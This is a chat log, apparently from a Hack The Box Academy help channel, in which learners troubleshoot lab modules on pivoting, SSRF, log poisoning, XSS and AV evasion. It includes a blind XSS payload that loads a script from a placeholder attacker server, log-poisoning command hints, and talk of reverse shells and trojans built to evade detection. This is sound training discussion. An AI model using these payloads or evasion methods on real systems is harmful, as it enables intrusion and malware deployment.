#modules

Well if breaking out of the parameters is possible you wouldn't want to worry about the parameters anymore, as there is smth else you could possibly achieve

ah right

lemme try smth

So I'm reading the question very very carefully, it's telling me to create a reverse shell on the machine I'm rdp'd in from dc01?

Because it's saying to create a reverse shell to the machine I'm connected via rdp

Im connected through rdp to ms01

Uh I don't get it

Like the question I don't understand what it's asking me

+1

If it's command injection, please stop posting potential spoilers

Oh its command injection

If someone wants to reach out to discuss, then do so through DM, but no spoilers for modules over Tier 0.

(not reach out to me, but if someone wants to reach out to them)

Password attacks- pass the hash

Sorry, I wasn't responding to you

Did you do that module

I cannot provide advice regarding modules over tier 0

Why?

?

?

Aight don't answer me

I'm HTB staff, I can't share information regarding paid modules

Also, please check the pinned comment here regarding asking questions about modules / sections.

The rdp machine has an internal network with other machines in it. Ur supposed to get a reverse shell on the dc, which u can only get from the rdp machine

wdym +1?

Just check your dms, you were posting spoilers

Like @marsh echo says use sudo and without 4. E.G.

sudo proxychains nmap

I do not understand why the training material (Dynamic Port Forwarding with SSH and SOCKS Tunneling) does not say to use 'sudo'. I wasted hours, again.

alr srry

The only thing with dc01 that I've done is dir \dc01\julio

But even if only ms01 can connect back to dc01 idk how to execute nc.exe in dc01

for the password reuse/default passwords section of password attacks, I can't get permissions to the shadow file unless I can become root user no? I found some ssh keys in one of the other users' folders. Do I need to crack those? Or would it be better for me to look up what folder MySQL login creds are stored in? Don't give me the answer I just want to know what direction I need to go in so I can google the rest.

nc isnt needed to send a connection back

all u need to do is listen on the rdp machine with nc and wmiexec will do the rest

I don't remember that one exactly, but maybe look for something similar to that file.

I can check my notes in a few.

yes that would be great. a hint in the right direction without giving away the answer would be very much appreciated

Oh wait, if you're in pw Reuse and default maybe try that? Try pwds you already have and known default? Again not at my computer.

dm me the creds

Sorry, but spoilers

Please don't post such information for modules over Tier 0

Glad you got it though

ok so now I am having trouble with the Default passwords / Password Reuse section of password attacks module

my issue is I have this long default creds list and I don't know which one to use

@sly trench it should be the dc hostname

just tried it

I figured it out

I'm still after assistance on this one, if anyone can provide a pointer please?

In the Pivoting, Tunneling & Port Forwarding > Assessment, one question asks us to identify a user who is "utilizing services in a way that exposes the user's credentials and the network as a whole". What does this mean? Has a service been setup to run with privileged user credentials?

The screen shot contains the question wording and the output from a LSASS dump. Can someone point out how to identify what the questions is asking for?

or should I be looking elsewhere, maybe, to know when a service is running as a user?

Look more in through the dump

I'm not picking up on it. The screen shot above is the only place the user in question appears, but I'm not seeing a difference between this user, the other user, and the computer/object's details.

The clear text password is different, but I'm not connecting that with how you "utilize services". I don't know what that means.

I’m not at my pc rn

Dm me tha password

Is it MSSQL? I haven't taken that module yet, but I might suggest stuff covered in the CPTS path's other modules.

To require MSSQL trickery seems like a bit much for a CME module's assessment.

That's a tier 3 though, so a little above my level. 😅
At least I bumped the inquiry.

Check through the other sections of the module, don't get too focused on one service 🙂 @oak lance

If you find yourself at a dead end, it can help to take a step back and see what else you have in front of you.

I need help with the identifying SSRF module. I tried running ffuf but get a ton of open ports back.

it says to Exploit a SSRF vulnerability to identify an internal web application.

what module?

server-side attacks

ffuf shouldn't return a ton of ports, so i would double check that command against what the module teaches

you used the -fr parameter right?

i actually copy and pasted the command from the module

i kind of did what the module showed

i created a file that has a list from 1-10000 then ran the ffuf command that it used to identify the open ports

if you copied and pasted directly from the module that's why it's not working

well i changed the ip

the address was changed

well its either the target expired and you're not actually hitting it or there's something up with your ffuf command because like i said it shouldn't return a ton of results.

so i'd focus on looking into that.

ok ill go ahead and retry it

Umm

I m new

What i m doing here

Can anyone explain?

you want us to explain why you made the decision to join here?

are you ok?

ok your right i reran it and only a few ports open this time

dont i just connect using the http://ipaddress:port?

i did it by doing what the module showed

awesome that worked

why cant i just connect via http if its a web application?

you can

use burp

yeah i used burp but I mean why cant I just use http:ipaddress:8000

probably because the browser just processes the request like normal

i used curl for the whole thing

it just gives me an unable to connect

didnt try curl tho

you'll probably get a faster response if you just explain your struggle here instead of asking for a dm

#verify

?

yes

still in Teir 0 modules. Is this the place to ask for advice or another channel?

Yes you can ask questions related to modules here.

I recommend reading the pinned messages first.

it helps to post the link to it, ask some specific questions

Just need some advice or just get others experience. Currently in Information Security Foundations and in Linux Fundamentals module setting up VPS with ParrotOS with Vultr but having some issues with what it says is not enough space. Set up a personal VM with more storage to see if that is the problem but it says the same low storage after the apt update and full-upgrade of parrotOS. Is this normal? I would rather run VPS instead of internal VM on network.

I just read pinned. Thanks for the advice. Fairly new to discord and learning as I go.

you don't need to set up a VPS tbh

also i 100% know your problem

you need to first run the installer

after installing it on the VM/VPS you then need to reboot

afterwards you can install to your hearts content

it also depends how much storage you allocated

i use 80GB for my parrot storage on my vm; and haven't run into any issues with storage space

Ahhh... I see. Well I just destroyed last few VPS so let me rebuild and try this out. I just chose the $12 plan which is very little storage but it is what module recommended.

imo i do more than the suggested

but also

VPS is NOT REQUIRED

i get you would rather do it

and I respect that

but on a personal VM you're always going to be able to access it

rather than relying on the uptime of the server hosting it

Was just trying to get it so I could have more then one instance per day limit and practice as needed.

I have it on personal VM but read in pinned threads not recommended. Thought VPS would be next best thing but I see what you are saying

????

many people use a personal VM

idk who's saying not recommended

lol

ltnbob — 12/22/2021 7:55 AM
Keep in mind that if you are connecting to any of HTBs networks from your personal system where you store your personal data there are penetration testers in training on the network. Its strongly advised to use a dedicated VM, computer or Pwnbox when learning with HTB and connecting to our network environments

I know that was a while back but just quickly read pinned and saw that.

ts strongly advised to use a dedicated VM, computer or Pwnbox when learning with HTB and connecting to our network environments

don't see where this is saying not to use a vm?

this is saying not to use your Host System

aka what you use daily

Ok I think I interpreted that wrong. Thanks for clearing that up. Might just do this route instead then.

Deploying VPS now just to try it out and will be moving back to my dedicated VM.

like using a VPS isn't a bad thing really

but it's not really there for those on a tight budget

I was updating VPS and VM at same time and the lag on VPS was so bad.

yeah that's the other thing

took 10mins for VPS and 2 for VM

with VPS you're very much limited to their network and connection

so it's harder to diagnose an issue

in general with security research, such as pentesting, you want to be in control of as many aspects as possible

I see the pros and cons. Also I was using ParrotOS just because of recommendation but used to Ubuntu and Debian 12. Is that ok to use as well instead of ParrotOS

generally it's better to use an OS that's more oriented towards this type of thing

as they'll generally have the tools or libraries in their repos

so Parrot or Kali recommendations?

i prefer parrot due to it being more lightweight on launch than Kali as Kali comes bundled with a lot of pre-running services

but it all comes down to preference

¯_(ツ)_/¯

Perfect.
Anything that helps me learn. Im sure there will be a learning curve involved.

not to mention with distros like Parrot or Kali they'll have some of the more popular tools that are used installed

saving lots of time when it comes to potentially needing to reinstall the OS due to some unforseen accidents/troubles

i.e. somehow your OS bricking yourself after an update but works fine on a fresh install

there was a kernel panic associated with a driver error in parrotOS when upgrading from 5.x to 6.x because for w/e reason it wasn't properly removing it

oh wow!! I see what you are saying. The easier the better.

whenever something like that happens i backup and transfer my /home/user/* to my host then transfer and unwrap it in the fresh install

Good to know. I'll take that as some good advice that I will definitely keep in mind for future use.

the other big mclargehuge thing; take notes!

Im currently taking notes with Notion. It helps quite a bit for me.

i did the AttackingEnterpriseNetworks blind and because i was lazy at some points in my learning path I had to relookup from the relevant pages some tool syntax

i prefer obsidian myself

Obsidian is new to me. I can look that up as well.

markdown support and plenty of extensions

if it doesn't natively do that: There's a plugin for that

or there's a plugin to do a native function better

https://tenor.com/view/spongebob-smile-fading-unsmile-smile-and-unsmile-spongebob-meme-gif-21902324

i.e. there's a templater plugin that makes the native template plugin look like a joke

as it allows you to set the filename

and some other fun stuff

cannot wait until I get to that point

for the most part for notes you don't need templates

Ok... went through installer and even setup new user via bash and apt update and upgrade with same low storage notification. Reboot system and it sends me to install menu again for a clean install. Weird!!!

Tried to reboot a couple of time with same outcome of clean install option.

I am doing the foot-printing module, and am up to the FTP section, I have got the flag, but the first question at the end of this asks for the banner, I am unsure what it wants. the question asks for the whole line, so I tried copying in the whole line. and have tried all the different variations I can think of, but none of them are right. can anyone give me advice on what specifically the question is looking for?

Use templates only for the ease of organization. Other then that, probably wouldn't need the template

did you remove any trailing spaces?

yes

make sure not to include the status code

That was my issue, thank you

a lot of services provide a Status Code alongside the delivered message or just before the output of something

Thank you for the help

if you want to dive into different status codes you can always google "<Service> Status Codes"

they all follow a general similar structure though

2xx == positive message
3xx == resource moved
4xx == resource error of some form
5xx == server error of some form

some status codes for services even indicate an even more deeper meaning into the second digit

Hello all,
i have been stuck on attacking trust for like 3 days now i can't solve it the question number 2 Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt" from question 1 i abused acl to get admin on the DC and from DC and DC03 there is forest trust i tried sid history injection but its work can any one done this module help

If there's a forest trust can you not log into the DC03 or are you saying you only have localadministrator on DC01

please don't share any screenshots or spoiler info for modules above tier 0

someone that's done this can likely point you in the right direction though

it would really help if you said what module/section you're on.

im stuck on skill assessment i tried every thing from the course it did not work

i'm not seeing an attacking trust module in the search

Active Directory Trust Attacks

ah

that's why it didn't show up as "Attacking Trusts"

i feel like its a wasted 500 cube

i think it's a good module

i learned a lot

nah looking at the overview it looks promising

me too but the labs setuped for skill assessment so had for learning phase

?

its a challenge for sure

that's how all the modules are set up to provide a learning curve for the skill assessment

so that you are better prepared to tackle it

You finished ?

i haven't done the skill assessment yet or i could give you some advice

the First question its so good

with enumeration you can see the path

i'm sure the method is provided in the module, i'd go through each section again and just try everything that's in the module

i tired all of them

remember sometimes tools like bloodhound/adalanche can't see everything and you just have to manually enumerate, if you didn't do it manually

some of them require python on machine i eliminate them since i cant install python on the dc

well its probably not that then

i can tell you every time i thought there was something wrong with the module or i had to reach outside the module contents to move forward i was wrong

probably don't want to talk about specifics about the skill assessment

i got it

ya sorry maybe someone who did it can provide you some guidance but like i said i haven't done the SA yet

i hope so

I recommend looking at Ippsec's playlist on using Ansible to automate rebuilding a Parrot install https://www.youtube.com/playlist?list=PLidcsTyj9JXJVIFqyHBHzrRYKPpZYFjM8

you're assuming i care about that kind of thing

it doesn't happen often enough for me to need to automate it

I am. It's also just throwing it in here if anyone else was interested in building machines. I think he says that he builds new for every client but I'm yet to do this for work, so I'm not yet worried about leaking info between clients.

well yeah for client -- client basis you want a clean machine

as some clients may want an exported image of your machine

thank you broo

 sudo proxychains xfreerdp /v:172.16.5.129 /u:user /p:pass           
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.16.5.129:3389 <--socket error or timeout!
[10:30:33:158] [10308:10310] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:30:33:159] [10308:10310] [ERROR][com.freerdp.core] - failed to connect to 172.16.5.129

here why its not running but??

anyone face same problem in Dynamic Port Forwarding with SSH and SOCKS Tunneling

?

whats the proxy chains config?

i mean, the line where you specify the socks connection

like socks5 127.0.0.1 9050

Hey guys

hey

hey, still need help?

9090

ya bro its not running

That's illegal Vasy.

You will not get help for that here, and please stop asking.

whats your SSH command?

Read #rules

Okayyy

ssh -D 9090 ubuntu@10.129.145.208

you trying to pivot through SSH?

yes

the ssh command is wrong

Dynamic Port Forwarding with SSH and SOCKS Tunneling this module

its given in the theory part

it is?

lemme check, i dont remember that

@vagrant sentinel instead of trying to cheat your way around what went wrong, speak to your tutor.

sometimes the only payload we need is a chocolate and an apology

Hahaha

damn ur right, then i dunno, but try using -L

as you can see nmap is working

bro thats for port forwarding and i am doing pivot

i gotta redo the module damn

anyways, try connecting with netcat first

check if the remote port is open, just to discard possibilities

everything working expect this xfreerdp command

oh wait

does the nmap shows port 3389 as open?

sudo proxychains nc -vz 172.16.5.129 3389

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.16.5.129:3389 <--socket error or timeout!
172.16.5.129 [172.16.5.129] 3389 (ms-wbt-server) : Connection refused```

you have the wrong ip

sudo proxychains nc -vz 172.16.5.129 80  

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.16.5.129:80  ...  OK
172.16.5.129 [172.16.5.129] 80 (http) open : Operation now in progress```

is that the skill assessment?

?? 80 is showing open

yes

read the question again and you will find the correct ip for the rdp session

yeah rdp didnt work for me either, i just used winrm

unless i did something wrong

take a 2-3 minute pause and try again

xfreerdp tries to connect to the remote windows machine through port 3389 but its closed, try restarting your target

its been 2 days

dayum

i did bro

the 3 times i did it rdp didnt work eitther

again, read the question

nothing wrong with the target, there is no need to speculate what he needs to do and if the target is broken

Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

the ip you are trying is wrong

.19...

no way

typo

bruh ?? but the ip showing in ifconfig is other

the .129 is likely the internal IP of the host you ssh into

that's the ifconfig of the host you are going into

it's another NIC that allows access to the internal network

which 172.16.5.19 is on

you can revisit the networking module

wait why didnt rdp work for me tho 😭

yes; systems can have multiple NICs/Network Interfaces

did you also try rdp to .129?

¯_(ツ)_/¯

is that the pivot host ip?

yes

the .129 is the pivot host internal ip on the 172.16.4.0/23 network

@uncut ocean did you manage to do it?

nah i excluded that ip from the info i got

weird

¯_(ツ)_/¯

proxychains just sucks overall

but the main idea of this module is to pivot into the another machine internally and we have to check the other ip with ifconfig and here i get that ip and i ping it its working so according to the module i have to rdp into that part bec i am going to pivot that ip which is showing in the ifconfig

guys i love this server, i could stay awake all night just for the fun of talking with yall

here you're directly given the internal IP

you got the concept wrong

also the ifconfig is NOT showing another host on the system

it gives insight onto other networks the host potentially has access to

gotta ping sweep

my advice would be to revisit the networking module and the first sections of the pivoting module

in this case the ip is directly given, but yes ping sweep

okk i am going to check this first

it's 1000x better if you can use a pivoting tool that allows ICMP; because then you can use fping

what is the command of timeout in rdp??

xfreerdp --help

/timout:

Thankyou guys for clearing my doubts

reading is the key to success

how to lockpick success

ya but like in real world scenerio i get into host and i have to move further so how can i check that which host can the compromised system can communicate to pivot?

¯_(ツ)_/¯

pinging i think

I believe the module provides a ping sweep command

which varies on host

but the general format is just supplying a loop command that loops through 1..255 and sends a single ping and looks for a response using the shell language's command that can do that

let him read and finish the module and he will understand, don't push him 10 steps forward

i.e. findstr/select-string/grep

okay a bash script to ping a subnet

it's not required for this question

just focus on what's given to you first

local enumeration for config files containing other ips is also a possibility, since sometimes firewalls block ping requests

that's beyond the scope of the module

stills good to know

either way

beyond the scope

and let's not muddy the waters

alr

what's important to answer the question is directly told by the question

Another day

Hey

Hi

Hey
Wht is this server Abt
Can anyone tell me ? I’m new here

www.hackthebox.com

What’s that ?

hey i need help with with finding the path to mail in a htb workshop

when i try the "mail" command it cannot be found

how do i fix this?

from which module and section is that?

module 18 section 70

in linux fundimentals

check the environment variables of the user

thank you

🌞

Going to bed

🗣

hey, i have issue on module 23 section 252 for the "Try to use a different technique to gain RCE and read the flag at / "

I've been up for 1 hour ahaha

it helps if you use the actual module and section name

its File Inclusion at section Log Poisoning

i follow all the command for this question but i dont have result

I stopped being a .... and went to gym but I'm going to bed after this its getting late

You're right, physical activity is important for the body (even though I haven't done anything for 6 months now because of the CPTS ).

could someone guide me with xss skill assessment. i go the [200] GET /myscript.js followed by a closing.

i incldue the script in the comment and the website textbox

in the language parameter you target this file ? /var/log/apache2/access.log

do you replay the request in Repeater and do you attack the user agent?

to see the result you need to reset the user Agent inital Mozilla/ ....

I advise you to create a php server and to put an xss in all the fields with the name of the field to know which is the vulnerable field.

"><script src=YOURSERVER:PORT/name_field</script>

HELLO WORLD

Has anyone here done the dacl2 module ? spn-jacking first question, I feel like I don't understand the question, even read the "answer" provided in the gold annual writeup but it's the same as i did? https://academy.hackthebox.com/module/255/section/2911

i access it

yes and after when a go to "access.log?cmd=id" i dont have a result

Wouldn’t it be &

its same

i have test ? and &

iirc just find SPNs without without a corresponding computer object

U changed ur user agent too?

yes

Send another request with the user agent and try again

Yup, that's what I found but no variation on the computer name seems to work

first i send normal request after i send request with payload in user agent and after i send request access.log with command but dont work

Have you solve it yet?

Are u able to see the logs without the cmd?

Yup, I reset the box and vpn

hmm I have the name but didn't submit the answer, and it's not working for me either

yes

May I DM you to compare ? 😄

sure

Dm me a screenshot

@limber surge we can exchange here for xss i can give you hints ( i think i gave you an excellent hint ) we are not allowed to exchange private answer information

maybe the format and pay attention to the space between id and HTTP/1.1 and as I said don't forget to put the user agent back to normal

I put the absolute path of access.log

hey in the overview module in privesc section . it says if we have shell on a user then we can put our ssh public key in authorized hosts i dont see any use of this bcz we already have access to the user with reverse shell and can upgrade shell then why???

reverse shells aren't really persistent

we need to trigger the shell, but what if there is a better backdoor?

yeah but how it helped in privesc

the authorized_key file will not accepts any public key added by another user

It will privescc if you could write to root user’s authorised key file

Otherwise it’s to ensure you can login whenever if you lose the shell

guys, I have two question? (Please no hate, I'm a noobie) From Information Security Foundations there is a course called Setting up and under Linux section there is VM Setup, should I also create a VM with ParrotOS? Since we already have a My Workstation with ParrotOS already?

if you would like to have a local vm, then go for it

otherwise you can use the workstation

Thank you!

Hello, I managed to do it in two stages. The first stage was to compile on a virtual machine with Ubuntu 2.40 (the same GLIBC version as the pivot machine). Then, I manually installed the missing SSL on the HTB pivot machine. With these two parts, it should give you an idea of how to proceed. 😉

ok my bad, this is a very good exercise, it forced me to think.

Hey in the attacking splunk lab they say we need a bat file that will run when the app is deployed and ececute the power shell one line

Ivd modified a .conf file and put in run.ps1 inside it other than that i also modified the powershell script with attavking ip and port now what all do i have to do further

That sounds about right. After that it should just be uploading it and catching the shell.

Ya

I dont understand this echo part where does that go

That should all be in your bat file.

If you don't understand what that is I would do a little research to understand what it is you are doing, unless it is explained in that section.

No it isnt that properly explained

I understood up to that part where u out ur payload into that bin file then we modify this config file to make splunk run that payload

But where does this echo command come in that i didnt see there or i didnt understand that part alone

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/echo

i am at the second windows priv escaltion skill aseesment...and i cannot find the damn left behind cleartext privs....
i used:
Get-ChildItem -Path "C:\Path\To\Search" -Recurse -Include *.config, *.xml, *.txt |
Where-Object { $_.FullName -notmatch 'C:\Windows\' }

You can DM what you have done up to this point.

I uploaded it but shell not recueved in listner

Double check your stuff, make sure the machine is still running, and even reset it if you have verified everything is correct and not working.

The echo command

where is this enterd

Send me a DM

hello, im in "Network Enumeration with Nmap", in "Host Discovery". the question is - " Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result."?
i tried to read the hint, and still didnt understand, can help me?

What is the last paragraph in the reading material discussing?

"identify its system" could be read as "identify its OS"

when i did the privesc questions and in the second que i executed the command find / -readable i didnt get the /root path in that maybe i cant readanything in /root but i can in .ssh and it didnt show up .

why

Can you even do a directory listing in /root/?

no

is that the reason

Yes. So you're saying you can't ls /root/, but you can ls /root/.ssh/ ?

yeah

If so, yes, that's the reason. find is looking at each directory discovered and observing the permissions. If it can't list anything in /root/ it can't know there's a .ssh directory.

it (or you) could only guess what directories are there and hope they not only exist, but you have some kind of permission for them.

bcz of it i thought of another things to escalate

hey guys!
https://academy.hackthebox.com/module/158/section/1434

I am following exactly what is being taught in this section but, i cannot browse the ip via proxychains. Am i missing anything or overlooking?

nope i followed the steps and it works so you're probbaly missing something

i started the server, ssh'ed with -D 9050 and connected via client script, now when I open the ip via proxychains, it won't load at all.

please delete this message if I am giving too much info

proxychains4.cfg - has the 127.1 9050

should I change the file name to proxychains.conf instead?

FYI - I am using my personal machine

no need to change proxychains config file name, just do it like the module says

I followed exactly and tried atleast 3 times, still no luck on opening the IP

I also tried opening both discoverable IPs (ping-sweep for-loop script)

is the web running on non-default port?

do I have to perform the nmap for the IP?

you can try following the instructions exactly in pwnbox for a sanity check. proxychains4.cfg sounds weird, what OS are you using?

tried resetting the target, tried on pwn box too

kali with zsh

MODULE: Advanced SQL Injections
SECTION: Reading and Writing Files

Could someone tell me what am I supposed to do to get the flag? I already completed the task.

I don't know what you're on about with proxychains4.cfg. That's not in the guide at all.

and it's not a kali thing

I'll try renaming once

keep in mind ping won't work through proxychains

performed ping-sweep scan from jump host (ubuntu)

ok, that's cool, but not being able to ping through proxychains threw me off is all I'm saying. full tcp connections only.

I did not perform any scan, as soon as I discovered the IP (same as shown in the example explanation), browsed through proxychains

renaming to proxychains.conf worked

Weird. I can't imagine how you got a file called proxychains4.cfg. ¯_(ツ)_/¯

The file you should be editing is usually found at: /etc/proxychains.conf

I never touched until this module/section

Create a file in that directory and after you do it, access that URL to get the flag

Ahh got it! thanks. Was expecting the data in the filesystem 😛

this

Yes, and below it is a sentence that suggests you can identify an system [OS] by the TTL.

right

but where i can see the TTL in the pic?

On the far right you can see the ttl= field, but the value is obscured by the box's size. You need to scroll.

thx!

Is hacking largely about squinting your eyes and scrutinizing indecipherable jibberish in the computer outputs?

Not very hollywood.

Who said Hollywood was right?

how do i find the index number of the sudoers file? I've been stuck on this for 30 min

Hello everyone! I'm stuck on Introduction to Windows Evasion Techniques SA1. I have two different but similar developed trojans, I scanned them with both the ThreadCheck tool and YARA with the crime_wannacry.yar and apt 17 rules, and a number of other rules that I found on the Internet for msf and microshell. My trojans are not detected, they were checked for virus total, there were 7 static ML triggers. If anyone has completed this and can advise what the problem is, please write to me in DM, I've been trying to solve this task for a week now

I am having an issue with this question Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

man ls and look for the word 'index'

What issue are you having also there's a forum that answers this question if you google, and it explains the commands

ok

When going through the academy paths how much is it recommended to mix up the structured work with ctf boxes on the htb site? As it drops you into situations that are closer to scenarios we may come across? Was just a thought the last 2 questions in the footprinting imap/pop3 had me stuck for a bit and thought I’d like more scenarios to help understand more

Any recommendations for OSINT geolocation tools?

Google

There's an OSINT module but geolocation doesn't sound like a passive OSINT recon

There is a corporate OSINT module though

You can do reverse image searches through google which can help get rough locations

exiftool can grab geotagged data if it's embedded in the image

Or data

Isn’t that less effective on more recent images/devices?

Well

In general by default a lot of stuff is tagged, and you have to turn it off

Oh ok, I remember studying a bit on it a while ago, the amount of info you can get from an image is scary

Even then there are just people who can identify you by the color of grass

Or the tree

Plenty of correlational data

Yeah or location of the bin in reference to a door 😂

Have you seen rainbolt's geoguesser games?

Yes I have, it’s interestingly fun

I also played a game can’t remember the site but they show you a picture and you have to drop a random pin and closest to it gets the points I played it with my work team

Hi all!
Please tell me, I'm currently going through the Linux Fundamentals module, and now I'm in the Network Configuration part. I'm trying to Configure SELinux to allow a single user to access a specific network service but deny access to all others. I made 2 SELinux policy modules - one allows a user in the staff_t group to connect to the SSH service, and the user_t and unconfined_t groups cannot connect via ssh. But for some reason all groups can still use SSH. Please tell me where to dig?

You don't have to configure SELinux that's heavily optional

Genuinely curious as to what I'm doing wrong here.

https://linux.die.net/man/8/ssh_selinux

Proxychains refuses to connect RDP (left) through the SSH tunnel (right). Module: Pivoting; Section: Dynamic SSH/SOCKS

Anyone?

Try adding /timeout:9999

Or running proxychains with sudo

Still nothing; trying proxychains with sudo next

error: XDG_RUNTIME_DIR is invalid or not set in the environment.

Ah

¯_(ツ)_/¯

Try with remmina

Not KRDC?

I kinda purged a lot of proxychains info since switching to ligolo-ng

I don't recall having many issues with this

But I believe the question states authenticating to

Not necessarily rdp

Unless I'm misremembering

could be nothing, but can you access the host via psexec or powershell remoting and check if HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin is set to 1 ?

Well that doesn't sound like the issue tbh

If it was he'd still connect but then be shown the message regarding restricted admin

yeah I usually get a different error when the registry key is set and I try to rdp with non rid-500 account, but who knows

victor is not the admin on the box, so that wouldn't make a difference.

it's the other way around, if that registry key is set only built in RID-500 Administrator account can log in via RDP, any other user cannot regardless of their privileges

but it's prob not the issue as marcie said, this concept is later introduced in the AD module IIRC

I believe the question states "authenticate to"

Authentication isn't always rdp

No, it's Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

Wait is this the socksoverrdp section?

The ssh -D section.

Weird that it's giving a no route to host error though

Change vpn regions and respawn the target

I suggest reaching out to support

Yes, I know. What's especially weird about this is that using nmap -PR over proxychains was causing the 172.16.5.x IP addresses to resolve to some weird qarestr.sub-172-16-5-*.myvzw.com domains, so it might be an ISP issue since I do use Verizon 5G Home Internet.

Wait

Is your home network a 172.16.x.x network?

No, it's a 192.168.0.x network

So it shouldn't affect anything

Try just restarting your vm

Is your vm in a 172 network?

I'm not using a VM. I'm using Garuda Linux + pacman -S blackarch on a physical host.

Ah

That's beyond my depth

Reach out to support

Going to try this module over PwnBox in the meantime.

G0b isn't support

Reach out to support via the bubble on the page

G0b is actually CTO iirc

Well it works fine in PwnBox. Yeah, not sure what the problem is from my end.

Hello guys I’m an soc analyst but I’m really interested in penetration testing can anyone help me in how to start pentesting?

@bright pivot consider filters. But you should be able to figure it out

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

with fs -900?

Whatever size is most common that you see

I have the flag for the XPath - Blind Exploitation on injection attacks module but it wont let me submit 😦

can people verify that the flag should be a 33 character length?

The flag should be in the format ||HTB{....}||

its not

alr, i found my mistake. Thanks guys!

@old oasis can i dm, or @acoustic owl can i dm?

im struggling to locate the flag if you get what i mean

but i dont want to post my path here

sure

I cant ssh to the server

have you tried asking the server nicely?

ssh: connect to host 10.129.4.64 port 22: No route to host

Shows this error

Yes

no route to host

I am using vm instance

is that the target for the question you're on? you said vm instance, you mean pwnbox?

or your own vm

if your own vm, are you connected to the vpn?

Pwnbox

Yes

I tried connecting from my own vm using vpn it showed the same error i tried pwnbox still shows the same error

are you able to ping the machine?

Yep shows host is unreachable

Are there known issues with xfreerdp sessions to windows vms dropping frequently? Sessions are failing after less than five minutes. Very frustrating.

Should i reset the target?

well thats why you can't connect to the ssh

i dont think that will make any difference, its probably about your connection with the VPN :/

I am getting the same problem in pwnbox too

that's odd

use tcp vpn

do you have the vpn running on your host machine/vm?

if so turn that off

Aight

I'm currently using the academy-regular.ovpn file with openvpn to connect. Are you suggesting using a different means of connecting to the vpn?

there's a tcp and udp download option

for the vpn config

Where can I find that? I just followed the link in the course, which doesn't differentiate.

scroll up

where it says "choose vpn location"

...and there it is. Thank you!

rdp and udp aren't a good combo

as rdp generally wants a connection-oriented protocol

Makes sense.

other than that changing the region altogether can also just fix it ™️

Cool. Good data. Thanks again!

Well, just disconnected again.

Might try changing region if it persists.

is pwnbox ever 100% needed?

only in a handful of cases like where it explicitly asks for a path in pwnbox

or where for whatever reason it just works ™️ in pwnbox

Hello

a

the hints should be visible after youve solved it yk, maybe i just wanna know they got to say 😢

Hello

refresh the page... hints appear to visible for me when I revisit old modules I've completed.

Anyone for a nudge on the RCE part of the Advanced SQL Injections SA?
I got a Python script that executes a query to the DB, which is validated by changing and retrieving some of the data in the DB.
Also tested the RCE in other Section with valid results.

someone can refresh my memory please, i can't remember the name of the tool that allows you to generate a list of users from a username for password pulverisation i can't remember which section it was given in the cpts

Login brute forcing is the module. Username anarchy is the tool.

you're a boss thanks man

ooo thank you sir

Hi

I'm on skills assessment for shells and payload and having a little trouble enumerating the password and username for the apache tomcat website on host 1

Good days lords hackers , I want to ask is there ways to pause academy subscription have been busy for the pass 2 months I can’t do any module and my subscription is running out is there a way to put a pause on it

Not that I'm aware of and have never heard of anyone obtaining extensions for their annual sub. Reach out to support on the site.

anyone have any idea 😅

yea they are check this out

Can’t send spoilers bro

As u can see I put the credentials the first option and it still didnt work

do u have any tips

Why did u have a wordlist?

I'd take it to DM if you want to nudge 🙂

Its default auxillary scanner

can I dm u @safe star

Ye

thx

ill also mention when i use -o flag to output to a file it comes up empty so i had to grep > file.txt to save the output

sorry, may I dm u as well 😅

No, sorry - I can't directly advise

T2 module, please don't share screenshots like that Sedan

okay i blocked the answer out but my bad

ok could u give me some tips here if possible

Hi

I'm on skills assessment for shells and payload and having a little trouble enumerating the password and username for the apache tomcat website on host 1. Is it possible I have to change the wordlist?

I completed the module a long time ago, but maybe I can help. You can send me a DM

thanks

@muted jacinth Hey man can i ask you pls

will do, thanks!

Attacking web applications with FUFF:

Parameter fuzzing

Question:Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?

I've been trying this for a while but taking too lng could anyone give a hint here
ffuf -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:44121/admin/admin.php?FUZZ=key

Just read the challenge description again, try to understand it and then make researchs on api reponses........you'll basically need to analyse the JS code firstly

Did you filter correctly?

What do I filter with?

What were u filtering with before?

I did'nt use any filters how do I figure out what to fitler for?

Am I missing something?

filter by a common occurring size

The example also showed it

I'm actually lost, what is the common occuring size ?

Exclude the size that’s shows up the most

Didn’t last section show the filters?

I dont get any results in the first place

to even make an filter based on content size

Did u wait for it to complete?

you do get a result

you have 80 errors

can you resolve and ping that target?

oh lol I had to restart the machine it's working now thanks 🙂

Up to the first socat section of the pivoting module — why is it saying "Connection refused" when I literally copy and paste the command from the module onto the pivot box?

that means the port is closed

Which port? 8443 on the target or 8080 on the pivot?

the port on the server you're attempting to connect to on that port

Well I'm trying to pivot, not connect to a port, so I'm not sure what you're talking about.

yes and one computer is the server and one is the client in this case

the server is the host that is listening for the connection

it tells you exactly which IP is refusing the connection right there in your screen shot

